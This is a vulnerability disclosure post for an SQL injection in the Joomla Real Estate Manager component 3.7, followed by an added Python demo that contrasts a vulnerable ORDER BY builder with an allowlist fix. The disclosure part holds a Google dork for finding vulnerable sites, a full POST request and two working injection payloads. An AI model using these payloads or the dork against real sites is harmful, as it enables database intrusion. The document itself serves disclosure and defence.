October 13, 2016 Omer Ramić Pentesting

This vulnerability was found in the Joomla CMS component Real Estate Manager, version 3.7. The vulnerability is an SQL injection (SQLi). I found it on October 10th, 2015. I submitted the finding to the vendor of the component, and they fixed it in the next version.

Exploit module for Metasploit can be found here: https://www.rapid7.com/db/modules/auxiliary/gather/joomla_com_realestatemanager_sqli

REMARK: This vulnerability was found and tested on localhost.

# Component description on vendor page:

Real Estate Manager is a handy Joomla rental component and a powerful solution for real estate website creation and property management. It will fit perfectly for independent estate realtors, property rental companies and agencies, motel booking, hotel room booking, property rental, real estate selling and realty management.


# Additional information about the component:

# Title of the vulnerability/exploit: [Joomla component com_realestatemanager - SQL injection]
# Google Dork: [inurl:option=com_realestatemanager]
# Date: [2015-10-10]
# Author of the vulnerability/exploit: [Omer Ramić]
# Vendor website: [http://ordasoft.com/]
# Link to software: [http://ordasoft.com/Real-Estate-Manager-Software-Joomla.html]
# Version: [3.7] & probably all older versions
# Platform it was tested on: Linux/Windows/PHP 5.5.28/Apache 2.4.16
# Multiple vulnerable parameters (PoC is given only for the first parameter):
Parameter_1: order_direction (POST)
Parameter_2: order_field (POST)
# Vulnerable parameters 1 & 2 are in this POST request:
POST /index.php?option=com_realestatemanager&task=showCategory&catid=50&Itemid=132 HTTP/1.1
Host: [HOST]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[HOST]/index.php?option=com_realestatemanager&task=showCategory&catid=50&Itemid=132
Cookie: security_level=0; 9d929655f6556b9fb49bf0e118bafb11=tp72u418eemk6jdvvnctoamna0; countrytabs=0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 37

order_direction=asc,(SELECT (CASE WHEN (7918=7918) THEN 1 ELSE 7918*(SELECT 7918 FROM INFORMATION_SCHEMA.CHARACTER_SETS)END))&order_field=price
order_direction=asc,(SELECT 1841 FROM(SELECT COUNT(*),CONCAT(0x716b787671,(SELECT(ELT(1841=1841,1))),0x716b786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_field=price
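Both vulnerable parameters above are sort controls, and that is the root cause worth understanding: ORDER BY identifiers and directions cannot be bound as prepared-statement parameters, so a component that concatenates `order_field` and `order_direction` into the query string hands the request a free SQL expression (the `asc,(SELECT ...)` payloads work exactly because a trailing comma starts a second sort expression). The example below is added here and is not the component's code or the vendor's fix; it is written in Python with an in-memory SQLite table so it runs offline, and the `properties` table, its columns and the sample rows are constructed assumptions. It shows the concatenating pattern beside the standard mitigation: an allowlist that maps the untrusted strings to fixed column names and directions and rejects anything else before it reaches SQL. The tampered input uses a harmless CASE expression, not the advisory's payload, to show that the vulnerable builder executes whatever expression follows the comma while the hardened builder refuses it.

```python
import sqlite3

# Constructed sample data standing in for the component's property table
# (assumption: the real schema is not given on the page).
SAMPLE_ROWS = [
    ("Flat A", 120000),
    ("House B", 350000),
    ("Studio C", 80000),
]

# Allowlists: only these values may ever reach the ORDER BY clause.
# The keys are what the request may send; the values are what goes into SQL.
ALLOWED_ORDER_FIELDS = {"price": "price", "name": "name"}
ALLOWED_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def build_query_vulnerable(order_field: str, order_direction: str) -> str:
    """The pattern behind the advisory: request parameters concatenated
    straight into ORDER BY. A comma in either value starts a new sort
    expression, so arbitrary SQL is evaluated."""
    return f"SELECT name, price FROM properties ORDER BY {order_field} {order_direction}"


def build_query_safe(order_field: str, order_direction: str) -> str:
    """Hardened form: the untrusted strings are only used as lookup keys.
    Whatever ends up in the SQL text comes from the allowlist, never from
    the request, and unknown values are rejected with ValueError."""
    try:
        column = ALLOWED_ORDER_FIELDS[order_field]
        direction = ALLOWED_DIRECTIONS[order_direction.lower()]
    except KeyError as exc:
        raise ValueError(f"rejected sort parameter: {exc.args[0]!r}") from None
    return f"SELECT name, price FROM properties ORDER BY {column} {direction}"


def run(query: str) -> list:
    """Execute a query against a throwaway in-memory table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE properties (name TEXT, price INTEGER)")
    conn.executemany("INSERT INTO properties VALUES (?, ?)", SAMPLE_ROWS)
    rows = conn.execute(query).fetchall()
    conn.close()
    return rows


def demo() -> dict:
    """Same injection point as the advisory (order_direction), with a harmless
    CASE expression appended after a comma instead of the real payload."""
    tampered = "asc,(CASE WHEN 1=1 THEN 1 ELSE 0 END)"

    # Vulnerable builder: the query is accepted and executed with the
    # attacker-controlled expression embedded in it.
    vulnerable_sql = build_query_vulnerable("price", tampered)
    vulnerable_rows = run(vulnerable_sql)

    # Hardened builder: the same input never becomes SQL.
    try:
        build_query_safe("price", tampered)
        safe_rejected = False
    except ValueError:
        safe_rejected = True

    return {
        "vulnerable_sql": vulnerable_sql,
        "vulnerable_rows": vulnerable_rows,
        "safe_sql": build_query_safe("price", "asc"),
        "safe_rejected_tampered_input": safe_rejected,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The allowlist approach generalises to any user-controlled sort, filter-column or table-name parameter: because these fragments are identifiers rather than values, escaping or quoting them does not help, and mapping through a fixed dictionary is the only construction that keeps request text out of the query entirely.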